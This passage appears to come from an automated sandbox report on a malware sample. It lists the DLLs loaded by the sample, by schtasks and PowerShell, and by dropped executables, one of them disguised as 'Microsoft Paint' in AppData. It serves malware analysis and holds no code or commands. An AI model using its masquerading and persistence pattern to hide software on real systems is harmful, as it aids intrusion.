Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msscntrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfproc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sysmain.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tapiperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: usbperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: netfxperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: bitsperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: esentprf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfts.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: utildll.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdtcuiu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdtcprx.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mtxclu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msscntrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfdisk.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wmiclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfnet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfos.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfproc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sysmain.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tapiperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: usbperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tquery.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
